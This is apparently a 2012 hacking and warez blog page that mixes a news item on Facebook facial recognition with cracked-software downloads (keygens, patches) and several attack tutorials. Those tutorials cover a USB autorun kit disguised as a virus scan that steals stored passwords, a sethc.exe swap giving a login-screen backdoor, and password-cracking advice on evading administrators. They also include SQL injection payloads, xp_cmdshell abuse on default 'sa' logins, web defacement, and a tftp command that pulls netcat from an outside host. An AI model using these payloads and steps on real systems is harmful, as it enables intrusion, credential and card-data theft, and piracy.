FACEBOOK SWITCHES OFF FACIAL RECOGNITION TOOL IN EUROPE

Written By TAC Team on Tuesday 30 October 2012 | 01:51

London: Facebook said on Friday it had switched off the facial-recognition tool that prompts users to "tag" photographs uploaded to its website following a privacy investigation.
     The feature was identified by regulators as one of the main privacy threats posed by the social networking site. Ireland's data protection commissioner, Billy Hawkes, who launched the probe because Facebook's European operations are based in Ireland, said he was happy that the site had agreed to remove the tool in Europe by October 15.
     New users are already unable to access it. Hawkes said: "I am satisfied that the review has demonstrated a clear and ongoing commitment on the part of FBI to comply responsibilities."
     He added: "By doing so it is sending a clear signal of its wish to demonstrate its commitment to best practice in data protection compliance." Facebook said in a statement: "In light of discussions with our regulator in Ireland, we have agreed to suspend the Tag Suggest feature in Europe."
     It said it would work with the Irish authorities "on the appropriate way to obtain user consent for this kind of technology under European rules".
     Facebook was ken to encourage members to "tag" their friends in photographs because it ensures they are shared more widely, but it has been a controversial addition to the site. Europe-versus-Facebook, an Austrian campaign group that has been fighting for clearer privacy policies on Facebook and already took its complaints to the DPC last year, welcomed Frid-day's ruling.

SOURCE: TIMES OF INDIA NEWSPAPER

ANGRY BIRDS 4 IN 1 (All Full versions)

Written By TAC Team on Tuesday 23 October 2012 | 04:30





Activation Key :

FULL-GAME-SOFT-WARE

Download :


STELLAR PHOENIX WINDOWS DATA RECOVERY PROFESSIONAL 5.0 Incl Crack




Recovers deleted files and folders from Windows Operating System based hard drive and other storage media

Stellar Phoenix, our award winning software recovers lost and deleted data. It helps in cases of hard drive corruption or formatting, virus attack, malfunction etc.

Key Features 
Data lost due to formatting or corruption of partitions.
Recover data from internal and all external storage media.
Supports Recovery from Hard Drive Greater than 2TB
Supports all version of Windows and also ready for Windows 8

Download :
Click Here To Download

Crack:
Click Here To Download

USB DISK SECURITY 6.1.0.432 FULL






USB storage is a common source of infection with potentially dangerous content, but a lot of antivirus software can not effectively detect the malicious programs from USB drives. USB Disk Security provides the best protection against any threats when using USB drives.

Features                                              USB Disk Security 
Prevent any threats via USB storage              check 
Protect offline computer                                check
Prevent data loss via USB storage                 check
Never slow down your computer                  check
Compatible with all antivirus software           check
Free update for lifetime                                check

This application is installed in the computer so that whenever you enter the USB in the computer it will analyze immediately and show you the threats.usb disk,usb disk security license

1. Extract
2. Install Setup
3.Run It , Click Activate Product
4.Run Keygen , Generate Code
5.Copy The Name And Code to Registration Box
6.Click Register! Your Done

TUNEUP UTILITIES 2013 INCL. PATCH

TuneUp Utilities 2013 v13.0.2013.194 - Final (Incl. Crack-iOTA)


TuneUp Utilities can make your Windows operating system faster, more comfortable and more secure with just a few mouse clicks. And all operations performed on the operating system are completely safe, because all changes are monitored by TuneUp Rescue Center and can be undone at any time.
Maintain System

Regular maintenance increases the stability of your PC, but is complicated and takes a lot of time when doing it manually. Spare yourself the stress! With TuneUp Utilities, you can clean up your computer and delete unnecessary files with only one click. Neat!

• 1-Click Maintenance and Automatic Maintenance

• Optimize system startup and shutdown

• Defragment hard disks

• Remove broken shortcuts

• Defragment registry

• Clean registry
Increase performance

Whether you are working or gaming: TuneUp Utilities increases the performance of your PC. Programs that are used rarely or never are tracked down, startup processes are shortened and unwanted garbage files are eliminated. For trouble-free working on your PC.

• Turbo Mode

• Configure Live Optimization

• Free up disk space

• Configure system startup

• Display and uninstall programs
Fix problems

With only a few clicks, you can fix typical Windows problems as easy as pie — without being a PC expert yourself. TuneUp Utilities finds errors on data carriers and fixes them automatically — about 60 of the most frequent problems under XP™, Vista™, and Windows 7™. TuneUp Utilities can even restore files deleted by accident — quickly, easily, and reliably.

• Fix typical problems

• Restore deleted data

• Check hard drive for errors

• Manage running programs
Customize Windows

Give your Windows a new look with TuneUp Utilities and customize programs and system settings to meet your needs: cool new boot screens, icons, and animations provide that personalized look for your Desktop. You can easily customize the appearance of Windows and settings of many programs to your liking.

• Personalize Windows appearance

• Change Windows settings
TuneUp Utilities 2013

NEW! TuneUp Disk Cleaner 2013: Wipes system clutter from over 150 popular programs

NEW! TuneUp Browser Cleaner 2013: Cleans up 25 browsers

MORE POWERFUL! TuneUp Registry Cleaner & TuneUp Shortcut Cleaner

NEW! TuneUp Live Optimization 2.0: Boosts performance of applications
Click here to Get Links

DRIVER GENIOUS PROFESSIONAL 11.0.0.1136 INCL. PATCH !!



Driver Genius Professional Edition
Version: 11.0.0.1136
File Size: 13.69 MB
Patch : (2 MB)


Driver Genius Professional Features
1. Find latest driver for your computer. One click to update all drivers.

2. Automatically check for driver updates, make your drivers are always up-to-date.

3. Quickly backs up drivers installed in the system. Free to backup all drivers now!

4. Package all drivers to an executable auto installer. One click to restore all drivers.

5. Remove invalid or useless drivers, improve system performance and stability.

6. New system information tool. Detailed hardware inventory.

Operating System: 
Windows 2000/XP/2003/Vista/XP x64/Server 2003 x64/Vista x64/Windows 7/Windows 7 x64/Windows Server 2008/Windows server 2008 x64/Windows 8/Windows 8 x64

Driver Genius Professional Edition 11 (Version:11.0.0.1136)

1. Added Windows 8 Release Preview support.

2. Optimized Download-Time out settings to achieve more steady connection.

3. Hardware Info:
Added new hardware support and optimized performance for sensor monitoring.

4. Added Bulgarian and Hungarian languages support.

Bug fixes:

1. Fixed Download missions load repeatedly problem.

2. Fixed Hardware Info can't load drivers successfully in scheduled task mode.

Instructions:

1. Install the driver genius pro.

2. At the end of the installation, do not run Driver Genius.

3. Run patch as admin & apply the patch.

4. Enjoy :)


Click here to Get Links


CONVERT WIN 7 TO WIN 8 USING SCREEN PACK

Transform Windows 7 and XP to Windows 8



Download offline installer:
X64: Download
X86: Download
XP: Download


Support:
Windows 7 , Windows 7 SP1 , Windows XP - [X86_X64] - [All Language] - [All Version]
Note : Skin Packs installer have easy and safe install option , Please unistall old or other version of skin packs before install new version. Before install close all runnig program , after finish restart your system.


HI GUYS IF YOU WANT MORE WINDOWS 8 SCREEN PACK JUST COMMENT BELOW.
Transform Windows 7 to Android Jelly Bean



Download offline installer:
X64: Download
X86: Download

Note : Skin Packs installer have easy and safe install option , Please unistall old or other version of skin packs before install new version. Before install close all runnig program , after finish restart your system.
Support:
Windows 7 , Windows 7 SP1 - [X86_X64] - [All Language] - [All Version]




COMMENTS BELOW....

TRACE YOUR FRIEND IP WHILE DURING CHAT TIME


LEARN HOW FIND YOUR IP ??

It is so Simple at first go in to www.Google.com go into search bar and type "WHAT IS MY"  in to search result you can find your IP address..


HOW TO FIND IP ADDRESS OF ANY WEBSITE USING COMMAND TROMP ?

You can see ping command and ip address


Press "Win+R" and write "CMD". Than Write Command "ping www.google.com"

How to trace IP of FRIEND During Chating ??

Find Someone’s IP Address During Chat When You are Chatting On Facebook , Google+, Gmail , Orkut etc. with that person
Follow those steps:→
 

1) First Just invite or ping that User for a chat Then open ‘Command Prompt‘ on your PC (Start –> Run –>cmd).
Note: Before trying this make sure you close all the other tabs in your browser. and only any of the Chat Service is open. Also if possible delete all the history and cache from your browser.

2) When command prompt opens Type the following command and hit Enter.
netstat -an (put space between "netstat and -an")
And you will get all established connections IP addresses there. Note down all the suspicious IP’s.

3) Now Trace that user using his IP address.Go to This Link : http://www.ip-adress.com/ip_tracer/ and paste the IP address in the box As Shown Below in Image. And It will show you the location of the user.


It will show you all the information about that user along with ISP and a Location in the MAP.
Now in the MAP Just click on “click for big ip address location” in the big picture you can actually zoom in. and try to recognize the area.

USE PEN DRIVE AS VIRTUAL RAM



SIMPLE STEPS :

1) Enter pen drive in to CPU socket..

2)Now Right Click on pen drive and Go to the Properties...


3) From that click On "READYBOOST".


4) Now click on USE "THIS DEVICE'' then click on apply and OK.. yout pan drive use all memory of pan drive..

when you are NOT want to use as RAM that time select DO NOT USE THIS DEVICE..

HOW TO INJECT ROOT KIT

Written By TAC Team on Friday 19 October 2012 | 00:06

I recently came to know that windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP.

FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. W need the following tools to create our own rootkit.


Here is a step by step procedure to create the password hacking toolkit.

1. Download all the 5 tools, extract them and copy only the executable (.exe files) into your USB Pen Drive. Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION=Perform a Virus Scan

Save the Notepad and rename it as autorun.inf. Now copy the autorun.inf file onto your USB pen drive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it to launch.bat. Copy the launch.bat file also to your USB drive. Now your rootkit is ready and you are all set to sniff the passwords. You can use this pen drive on any computer to sniff the stored passwords. Just follow these steps:


  • Insert the pen drive and the autorun windows will pop-up. (This is because; we have created an autorun pen drive).
  • In the pop-up window, select the first option ("Perform a Virus Scan". This function can be changed in the previous step).
  • Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
  • Remove the pen drive and you'll see the passwords in the .TXT files.
  • This hack works on Windows 2000, XP and Vista
This procedure will only recover the stored passwords (if any) on the Computer.

Enjoy..!!

HOW TO CREATE A BACKDOOR IN WINDOWS

Written By TAC Team on Thursday 18 October 2012 | 23:38

Firstly,

What is BACKDOOR?
A backdoor is a means of access to a computer program that bypasses security mechanisms. A programmer may sometimes install a back door so that the program can be accessed for troubleshooting or other purposes.


Step 1: On the welcome screen press 5 times shift key.

Step 2: A sticky pop up will be open just click on yes.

Step 3: Then just login from admin account and go on system32 folder.

Step 4: Copy sethc.exe and cmd.exe on the desktop.

Step 5: Then go on the folder option --> View --> deselect Hide extension for known file type.

   

Step 6: Rename sethc.exe to cmd.exe and vice versa.

Step 7: Copy paste and replace both files of system32 with your file.

Step 8: Then Logoff and press shift 5 times then cmd will open from there you can do anything with that computer.

Enjoy..!!

CYBER CRIME: AMANDA TODD WAS FOUND DEAD ON OCTOBER 10

Written By TAC Team on Wednesday 17 October 2012 | 05:59

Tragic: Amanda Todd, 15, was found dead on Wednesday in a suspected suicide
Tragic: Amanda Todd, 15, was found dead on October 10 after killing herself to escape cyber bullies
The internet vigilantes: Anonymous hackers' group outs man, 32, 'who drove girl, 15, to suicide by spreading topless photos of her''

Anonymous has named a man it claims posted topless pictures of a 15-year-old girl online and harassed her so relentlessly that she killed herself.

Amanda Todd, from Vancouver, Canada, was found hanged in her home on October 10, just weeks after she uploaded a video to YouTube detailing her horrific treatment at the hands of cyber bullies.

When she was just 12, a man in an internet chat room convinced her to flash her breasts, and a year later, he plastered a picture of the incident across Facebook.

Now in a vigilante move, Anonymous, the world's largest hacking group, has named the man allegedly responsible for the picture.

The group claims that he is a 32-year-old fromBritish Columbia, but MailOnline has chosen not to identify him for legal reasons.

As Todd's supporters set up Facebook pages warning the man to 'sleep with one eye open', the move by Anonymous sparks concerns over its abilities to create a 'trial by internet' - bypassing the justice system and casting guilt.

In a video posted to YouTube by Anonymous, a figure claims the group lists his personal information, including his date of birth and address.

It explains that his username appears on websites where he 'blackmailed' and gave advice to young girls. The same username is also tied to a website with a 'jailbait' photo gallery.

Video of Her:


Enjoy..!!

PASSWORD HACKING FAQ

Written By TAC Team on Tuesday 16 October 2012 | 21:52



Some of the password basics

Most accounts on a computer system usually have some method of restricting access to that account, usually in the form of a password. When accessing the system, the user has to present a valid ID to use the system, followed by a password to use the account. Most systems either do not echo the password back on the screen as it is typed, or they print an asterisk in place of the real character.
On most systems,the password is typically ran through some type of algorithm to generate a hash. The hash is usually more than just a scrambled version of the original text that made up the password, it is usually a one-way hash. The one-way hash is a string of characters that cannot be reversed into its original text. You see, most systems do not “decrypt” the stored password during authentication, they store the one-way hash. During the login process, you supply an account and password. The password is ran through an algorithm that generates a one-way hash. This hash is compared to the hash stored on the system. If they are the same, it is assumed the proper password was supplied.
Cryptographically speaking, some algorithms are better than others at generating a one-way hash. The main operating systems we are covering here — NT, Netware, and Unix — all use an algorithm that has been made publically available and has been scrutinized to some degree.
To crack a password requires getting a copy of the one-way hash stored on the server, and then using the algorithm generate your own hash until you get a match. When you get a match, whatever word you used to generate your hash will allow you to log into that system. Since this can be rather time-consuming, automation is typically used. There are freeware password crackers available for NT, Netware, and Unix.

1. Why protect the hashes?

If the one-way hashes are not the password itself but a mathematical derivative, why should they be protected? Well, since the algorithm is already known, a password cracker could be used to simply encrypt the possible passwords and compare the one-way hashes until you get a match. There are two types of approaches to this — dictionary and brute force.
Usually the hashes are stored in a part of the system that has extra security to limit access from potential crackers.

2. What is a dictionary password cracker?

A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts them to see if they encrypt to the one way hash from the system. If the hashes are equal, the password is considered cracked, and the word tried from the dictionary list is the password.
Some of these dictionary crackers can “manipulate” each word in the wordlist by using filters. These rules/filters allow you to change “idiot” to “1d10t” and other advanced variations to get the most from a word list. The best known of these mutation filters are the rules that come with Crack (for Unix). These filtering rules are so popular they have been ported over to cracking software for NT.
If your dictionary cracker does not have manipulation rules, you can “pre-treat” the wordlist. There are plenty of wordlist manipulation tools that allow all kinds of ways to filter, expand, and alter wordlists. With a little careful planning, you can turn a small collection of wordlists into a very large and thorough list for dictionary crackers without those fancy word manipulations built in.

3. What is a brute force password cracker?

A brute force cracker simply tries all possible passwords until it gets the password. From a cracker perspective, this is usually very time consuming. However, given enough time and CPU power, the password eventually gets cracked.
Most modern brute force crackers allow a number of options to be specified, such as maximum password length or characters to brute force with.

4. Which method is best for cracking?

It really depends on your goal, the cracking software you have, and the operating system you are trying to crack. Let’s go through several scenarios.
If you remotely retrieved the password file through some system bug, your goal may be to simply get logged into that system. With the password file, you now have the user accounts and the hashes. A dictionary attack seems like the quickest method, as you may simply want access to the box. This is typical if you have a method of leveraging basic access to gain god status.
If you already have basic access and used this access to get the password file, maybe you have a particular account you wish to crack. While a couple of swipes with a dictionary cracker might help, brute force may be the way to go.
If your cracking software does both dictionary and brute force, and both are quite slow, you may just wish to kick off a brute force attack and then go about your day. By all means, we recommend a dictionary attack with a pre-treated wordlist first, followed up by brute force only on the accounts you really want the password to.
You should pre-treat your wordlists if the machine you are going to be cracking from bottlenecks more at the CPU than at the disk controller. For example, some slower computers with extremely fast drives make good candidates for large pre-treated wordlists, but if you have the CPU cycles to spare you might want to let the cracking program’s manipulation filters do their thing.
A lot of serious hackers have a large wordlist in both regular and pre-treated form to accommodate either need.

5. What is a salt?

To increase the overhead in cracking passwords, some algorithms employ salts to add further complexity and difficulty to the cracking of passwords. These salts are typically 2 to 8 bytes in length, and algorithmically introduced to further obfuscate the one-way hash. Of the major operating systems covered here, only NT does not use a salt. The specifics for salts for both Unix and Netware systems are covered in their individual password sections.
Historically, the way cracking has been done is to take a potential password, encrypt it and produce the hash, and then compare the result to each account in the password file. By adding a salt, you force the cracker to have to read the salt in and encrypt the potential password with each salt present in the password file. This increases the amount of time to break all of the passwords, although it is certainly no guarantee that the passwords can’t be cracked. Because of this most modern password crackers when dealing with salts do give the option of checking a specific account.

6. What are the dangers of cracking passwords?

The dangers are quite simple, and quite real. If you are caught with a password file you do not have legitimate access to, you are technically in possession of stolen property in the eyes of the law. For this reason, some hackers like to run the cracking on someone else’s systems, thereby limiting their liability. I would only recommend doing this on a system you have a legitimate or well-established account on if you wish to keep a good eye on things, but perhaps have a way of running the cracking software under a different account than your own. This way, if the cracking is discovered (as it often is — cracking is fairly CPU-intensive), it looks to belong to someone else. Obviously, you would want to run this under system adminstrator priviledges as you may have a bit more control, such as assigning lower priority to the cracking software, and hiding the results (making it less obvious to the real administrator).
Being on a system you have legit access to also allows you better access to check on the progress. Of course, if it is known you are a hacker, you’ll still be the first to be blamed whether the cracking software is yours or not!
Running the cracking software in the privacy of your own home has the advantage of allowing you to throw any and all computing power you have at your disposal at a password, but if caught (say you get raided) then there is little doubt whose cracking job is running. However, there are a couple of things you can do to protect yourself: encrypt your files. Only decrypt them when you are viewing them, and wipe and/or encrypt them back after you are done viewing them.

7. Is there any way I can open a password-protected Microsoft Office document?

Certainly! There are plenty of commercial programs that will do this, but we give props to Elcomsoft. 30-day trial versions are available here.

Enjoy..!!

HACKING DATABASE




Databases have been the heart of a commercial website. An attack on the database servers can cause a great monetary loss for the company. Database servers are usually hacked to get the credit card information. And just one hack on a commercial site will bring down its reputation and also the customers as they also want their credit card infosecured. Most of the commercial websites use Microsoft sql (MSsql) and Oracle database servers. MS sql still owns the market because the price is very low. While Oracle servers come with high price. Well some time ago Oracle had claimed itself to be “unbreakable” But hackers took it as a challenge and showed lots of bugs in it also !! I was addicted to hacking of database servers from a few months. So I just decided to share the knowledge with others. Well the things discussed here are not discovered by me ok. Yeah I experimented with them a lot.

user will type his login name and password in login.htm page and click the submit button. The value of the text boxes will be passed to the logincheck.asp page where it will be 
checked using the query string. If it doesn't get an entry satisfying the query and will reach end of file a message of login failed will be displayed. Every thing seems to be OK. But wait a minute. Think again. Is every thing really OK ?!! What about the query ?!! Is it OK. Well if you have made a page like this then a hacker can easily login successfully without knowing the password. How ? Lets look at the querry again.

"Select * from table1 where login='"&log& "' and password='" &pwd& "' "
 

Now if a user types his login name as "Chintan" and password as "h4x3r" then these values will pass to the asp page with post method and then the above query will become
 

"Select * from table1 where login=' Chintan ' and password=' h4x3r ' "
 

Thats fine. There will be an entry Chintan and h4x3r in login and password fields in the database so we will receive a message as login successful. Now 
what if I type loginname as "Chintan" and password as
hi' or 'a'='a in the password text box ? The query will become as follows:

"Select * from table1 where login=' Chintan ' and password=' hi' or 'a'='a ' "
 

And submit and bingo!!!!! I will get the message as Login successful !! Did you see the smartness of hacker which was due to carelessness of web designer ? !!
 
The query gets satisfied as query changes and password needs to 'hi' or 'a' needs to be equal to 'a'. Clearly password is not 'hi' but at the same time 'a'='a' . So condition is satisfied. And a hacker is in with login "Chintan" !! You can try the following in the password text box if the above doesn't work for some websites:

hi" or "a"="a
 
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Here above -- will make the rest of the query string to be a comment other conditions will not be checked. Similary you can provide
 

Chintan ' --
 
Chintan " --

or such types of other possibilites in the login name textbox and password as anything which might let you in. Because in the query string only login name is checked as "Chintan" and rest is ignored due to --. Well if you are lucky enough you get such a website were the webdesigner has done the above mistake and then you will be able to login as any user !!!
 

IMP NOTE: Hey guys I have put up a page where you can experiment for yourself about the 
sql injection vulnerablity. Just go to www33.brinkster.com/chintantrivedi/login.htm 
More advance hacking of Databases using ODBC error messages!!!
--------------------------------------------------------------

Above we saw as to how login successfully without knowing password. Now over here I will show you 
how to read the whole database just by using queries in the URL !! And this works only for IIS i.e asp pages. And we know that IIS covers almost 35% of the web market. So you will definitely get a victim just after searching a few websites. You might have seen something like

http://www.nosecurity.com/mypage.asp?id=45
 

in the URLs. '?' over there shows that after it, 45 value is passed to a hidden datatype id. Well if you don't understand then as we have seen in the above example in the login.htm, having two input text types with names 'login_name' and 'pass' and there values were passed to logincheck.asp page. The same thing can be done by directly opening the logincheck.asp page using
 
http://www.nosecurity.com/logincheck.asp?login_name=Chintan&pass=h4x3r
in the URL if method="get" is used instead of method="post".

Note : or Difference between get and post method is that post method doesn't show up values passed to next paged in the url while get method shows up the values. To get more understanding of how they internally work read 
HTTP protocol RFC 1945 and RFC 2616.

What i mean to say is that after '?' the variables which are going to be used in that page are assigned the values. As above login_name is given value Chintan. And different variables are separated by operator '&'.
 

OK so coming back, id will mostly be hidden type and according to the links you click its value will change. This value of id is then passed in the query in mypage.asp page and according tothe results you get the desired page at your screen. Now if just change the value of id as 46 then you will get different page.
 
Now lets start our hacking the database. Lets use the magic of queries. Just type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
 

in the URL. INFORMATION_SCHEMA.TABLES is a system table and it contains information of all the tables of the server. In that there is field TABLE_NAME which contains names of all the tables. See the query again
 
SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
The result of this query is the first table name from INFORMATION_SCHEMA.TABLES table. But the result we get is a table name which is a string(nvarchar) and we are uniting it with 45(integer) by UNION. So we will get an error message as

Microsoft OLE DB Provider for ODBC 
Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'logintable' to a column of data type int. /mypage.asp, line

From the error its clear that first table is 'logintable'. It seems that this table might contain login names and passwords :-) So lets move in it. Type the following in the URL
 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable'--
 

output
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_id' to a column of data type int.
/index.asp, line 5

The above error message shows that the first field or column in logintable is login_id. To get the next column name will type
 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id')--
 

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'login_name' to a column of data type int.
/index.asp, line 5

So we get one more field name as 'login_name'. To get the third field name we will write
 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='logintable' WHERE COLUMN_NAME NOT IN ('login_id','login_name')--
 

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
 
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'passwd' to a column of data type int.
/index.asp, line 5

Thats it. We ultimately get the 'passwd' field. Now lets get the login names and
 
passwords from this table "logintable". Type

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 login_name FROM logintable--
 

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'Rahul' to a column of data type int.
/index.asp, line 5

Thats the login name "Rahul" and to get the password of Rahul the query would be
 

http://www.nosecurity.com/mypage.asp?id=45 UNION SELECT TOP 1 password FROM logintable
 
where login_name='Rahul'--

Output:
 
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar
value 'P455w0rd' to a column of data type int.
/index.asp, line 5

Voila!! login name: Rahul and password: P455w0rd. You have cracked the database of
 
www.nosecurity.com And's it was possible to the request of user was not checked properly. SQL
vulnerabilities still exist on many websites. The best solution is to parse the user requests and
filter out some characters as ',",--,:,etc.

Part II - using port 1434 (SQL Port)
 
-------------------------------------

Well uptill now we had seen how to break the database using the malformed URLs But that was done using just port 80 (http port) But this time we would use the port 1434 for hacking. Before that we will see what actually database servers are and how do they work and then how to exploit them !
 

The designers of MS sql gave some default stored procedures along with the product to make things flexible to the webdesigners. The procedure is nothing but functions which can used to perform some actions on the arguments passed to them. This procedures are very important to hackers. Some of the important ones are
 

sp_passsword -> Changes password for a specific login name.
 
e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’

sp_tables -> Shows all the tables in the current database.
 
e.g. EXEC sp_tables

xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. (most imp)
 

xp_msver -> Shows the MS SQL server version including the all info about the OS.
 
e.g. master..xp_msver

xp_regdeletekey -> Deletes a registry key.
 

xp_regdeletevalue ->Delets a registry value
 

xp_regread -> Reads a registry value
 

xp_regwrite -> Writes a registry key.
 

xp_terminate_process -> Stops a process
 

Well these are some important procedures. Actually there are more than 50 such types of procedures. If you want your MS SQL server to be protected then I would recommend to delete all of these procedures. The trick is open the Master database using MS SQL Server Enterprise Manager. Now expand the Extended Stored Procedures folder and delete the stored procedure by right click and delete.
 

Note: “Master” is an important database of the SQL server which contains all system information like login names and system stored procedures. So if a hacker deletes this master database then the SQL server will be down for ever. Syslogins is the default system table which contains the usernames and passwords of logins in the database.
 


Most dangerous threat : The Microsoft SQL server has default username “sa” with password blank “”. And this has ruined lots of MS sql servers in the past. Even a virus regarding this vulnerability had been released.
 

Thatz enough. Lets hack now. First we need to find out a vulnerable server. Download a good port scanner (many out there on web ) and scan for ip addresses having port 1433/1434 (tcp or udp) open. This is the MS Sql port which runs the sql service. Oracle’s port no. is 1521. Lets suppose we got a vulnerable server with ip 198.188.178.1 (its just an example so don’t even try it) Now there are many ways to use the SQL service. Like telnet or netcat to port no. 1433/1434. You can also use a tool known as osql.exe which ships with any SQL server 2000. Okz. Now go to dos prompt and type.
 

C:>osql.exe -?
 
osql: unknown option ?
usage: osql [-U login id] [-P password]
[-S server] [-H hostname] [-E trusted connection]
[-d use database name] [-l login timeout] [-t query timeout]
[-h headers] [-s colseparator] [-w columnwidth]
[-a packetsize] [-e echo input] [-I Enable Quoted Identifiers]
[-L list servers] [-c cmdend]
[-q "cmdline query"] [-Q "cmdline query" and exit]
[-n remove numbering] [-m errorlevel]
[-r msgs to stderr] [-V severitylevel]
[-i inputfile] [-o outputfile]
[-p print statistics] [-b On error batch abort]
[-O use Old ISQL behavior disables the following]
batch processing
Auto console width scaling
Wide messages
default errorlevel is -1 vs 1
[-? show syntax summary]

Well, this displays the help of the osql tool. Its clear from the help what we have to do now. Type
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “”
 
1>
Thats what we get if we login successfully else we will get an error message as login failed for user “sa”

Now if we want to execute any command on the remote machine then just use the “xp_cmdshell” default stored procedure.
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘dir >dir.txt’”
 

I would prefer to use –Q option instead of –q because it exits after executing the query. In the same manner we can execute any command on the remote machine. We can even upload or download any files on/from the remote machine. A smart attacker will install a backdoor on the machine to gain access to in future also. Now as I had explained earlier we can use the “information_schema.tables” to get the list of tables and contents of it.
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from information_schema.tables”
 

And getting table names look for some table like login or accounts or users or something like that which seems to contain some important info like credit card no. etc.
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select * from users”
 

And
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “select username, creditcard, expdate from users”
 

Output:
 

Username creditcard expdate
 
----------- ------------ ----------
Jack 5935023473209871 2004-10-03 00:00:00.000
Jill 5839203921948323 2004-07-02 00:00:00.000
Micheal 5732009850338493 2004-08-07 00:00:00.000
Ronak 5738203981300410 2004-03-02 00:00:00.000

Write something in index.html file ?
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘echo defaced by Chintan > C:\inetpub\wwwroot\index.html’”
 

Wanna upload any file on the remote system.
 

C:\> osql.exe –S 198.188.178.1 –U sa –P “” –Q “exec master..xp_cmdshell ‘tftp 203.192.16.12 GET nc.exe c:\nc.exe’”
 

And to download any file we can use the PUT request instead of GET Its just because this commands are being executed on the remote machine and not on ours. So if you give the GET request the command will be executed on the remote machine and it will try to get the nc.exe file from our machine to the remote machine.
 

Thatz not over. Toolz for hacking the login passwords of Sql servers are easily available on the web. Even many buffer overflows are being discovered which can allow user to gain the complete control of the sytem with administrator privileges. The article is just giving some general issues about database servers.
 

Remember the Sapphire worm? Which was released on 25th Jan. The worm which exploited three known vulnerabilities in the SQL servers using 1433/1434 UDP ports.
 

Precautionay measures
 
---------------------------

<*> Change the default password for sa.
 
<*> Delete all the default stored procedures.
<*> Filter out all the characters like ',",--,:,etc.
<*> Keep upto date with patches
<*> Block the ports 1433/1434 MS SQL and 1521 (oracle) ports using firewalls.

Remember security is not an add-on feature. It depends upon the smartness of administrator. The war between the hacker and administrator will go on and on and on…. The person who is aware with the latest news or bug reports will win the war. Database admins should keep in touch with some sites.


Enjoy..!! 

Popular Posts